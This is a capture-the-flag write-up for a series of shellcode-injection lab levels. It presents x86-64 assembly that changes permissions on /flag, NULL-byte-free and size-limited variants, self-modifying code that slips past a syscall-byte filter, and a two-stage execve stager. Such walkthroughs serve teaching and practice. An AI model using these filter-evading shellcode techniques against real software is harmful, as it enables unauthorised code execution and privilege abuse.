Shellcode Injection
level 1
Write and execute shellcode to read the flag!
We can use chmod to change fthe file permissions on the /flag file.
# Chmod syscall
lea rdi, [rip + flag]
mov rsi, 4
mov rax, 0x5a
syscallWe can compile the program using gcc.
$ gcc -nostdlib ./shellcode.s -o ./shellcodeThe -nostdlib flag, which tells the compiler not to include the standard C library.
Let's extract the .text section using objcopy.
$ objcopy --dump-section .text=./shellcode.bin ./shellcodeThe --dump-section is used to extract a specific section from the object file.
We can provide the ./shellcode.bin file as stdin to the challenge as follows:
$ /challenge/babyshell_level1 < ./shellcode.binWe can now read the flag.
$ cat /flaglevel 2
Write and execute shellcode to read the flag, but a portion of your input is randomly skipped.
Let's implement a NOP sled skips the first 0x800 bytes then.
.rept 0x800
nop
.endrThe rest of the steps and code remains the same.
level 3
This challenge requires that your shellcode have no NULL bytes!
We can use objdump to see the hexadecimal representation of our code.
~$ objdump -d shellcode
; -- snip --
0000000000001000 <_start>:
1000: 48 8d 3d 20 00 00 00 lea 0x20(%rip),%rdi # 1027 <flag>
1007: 48 c7 c6 04 00 00 00 mov $0x4,%rsi
100e: 48 c7 c0 5a 00 00 00 mov $0x5a,%rax
1015: 0f 05 syscall
1017: 48 c7 c7 00 00 00 00 mov $0x0,%rdi
101e: 48 c7 c0 3c 00 00 00 mov $0x3c,%rax
1025: 0f 05 syscall
0000000000001027 <flag>:
1027: 2f (bad)
1028: 66 6c data16 insb (%dx),%es:(%rdi)
102a: 61 (bad)
102b: 67 addr32As we can see, our code has a bunch of
NULLbytes.There's multiple ways to ensure that our code doesn't have null bytes, easiest being the use of smaller registers.
One challenge we will face is providing the FILENAME as an argument for our
chmodsyscall.We can work around this by pushing the "galf" onto the stack (Keep in mind memory is stored in little endian format so "flag" is stored as "galf").
# Chmod syscall
push 0x67616c66 <---- galf
push rsp
pop rdi
mov sil, 4
mov al, 0x5a
syscalllevel 4
This challenge requires that your shellcode have no H bytes!
H bytesare represented as0x48.They are used to denote instructions that operate in
64-bitcontext.Fortunately our code form level_3 works just fine.
level 5
Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), can you defeat this?
Since
syscallinstructions are now, we will have to create a self-modifying shellcode which will bypass the filters.For this, we have to create a label that has the bytes,
0x0eand0x04.
sys1:
.byte 0x0e
.byte 0x04Before this label is executed, we have to increment the byte values so that they are
0x0fand0x05which is the bytecode forsyscall.Our modifications should look something like this:
inc byte ptr [rip + sys1 + 1]
inc byte ptr [rip + sys1]
sys1:
.byte 0x0e
.byte 0x04level 6
Write and execute shellcode to read the flag, but the inputted data cannot contain any form of system call bytes (syscall, sysenter, int), this challenge adds an extra layer of difficulty!
The code from level 5 will work for this level but before that we have to make some changes.
Since the first 4096 bytes will not have write permission, we have to make sure that they are useless for our shellcode to execute. THis can be achieved using NOP sled similar to level 2.
.rept 0x1000
nop
.endrThis time the
nopinstruction will repeat 4096 times.
level 7
Write and execute shellcode to read the flag, but all file descriptors (including stdin, stderr and stdout!) are closed.
Since we are not outputting the flag to
stdout, this is not really a problem for us.We can go ahead and use the code from level 1.
level 8
Write and execute shellcode to read the flag, but you only get 18 bytes.
We could just use the code from level 4, as it is 14 bytes long.
~$ objdump -d shellcode -M intel
0000000000001000 <_start>:
1000: 68 66 6c 61 67 push 0x67616c66
1005: 54 push rsp
1006: 5f pop rdi
1007: 40 b6 04 mov sil,0x4
100a: b0 5a mov al,0x5a
100c: 0f 05 syscall As we are not writing anything in this code, we can just ignore the fact that first 4096 bytes are non-writeable.
However I think this is a great opportunity to get familiar with multi-stage shellcode. A multi-stage shellcode uses multiple scripts that execute the next script.
We can use two shellcode scripts for this level. The size restriction will only be enforced on the first script.
We will begin writing the second stage first.
// catflag.c
void main()
{
chmod("/flag", 4);
}Now let's compile this file using the following command:
gcc catflag.c -o \;Notice the output is a file named
;whose value is0x3b.The first shellcode which is also know an dropper payload or stager, will use
execveand execute the second stage.
# Execve syscall
mov al, 0x3b
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscallSince the hexcode for the
execvesyscall is0x3bas well, we can push$raxand then pop it back in to$rdias the file-path argument.This saves precious bytes. Credit goes to ctfwriteup.com.
level 10
Write and execute shellcode to read the flag, but your input is sorted before being executed!
This level mangles / sorts our shellcode after every 16 bytes.
Since the code from level 4 fits in 14 bytes, it won't get mangled and we can get the flag.
~$ objdump -d shellcode -M intel
0000000000001000 <_start>:
1000: 68 66 6c 61 67 push 0x67616c66
1005: 54 push rsp
1006: 5f pop rdi
1007: 40 b6 04 mov sil,0x4
100a: b0 5a mov al,0x5a
100c: 0f 05 syscall level 11
Write and execute shellcode to read the flag, but your input is sorted before being executed and stdin is closed.
Again level mangles / sorts our shellcode after every 16 bytes and since the are using
chmod, we don't care about stdin being closed.The code from level 4 will work here as well.
Last updated
Was this helpful?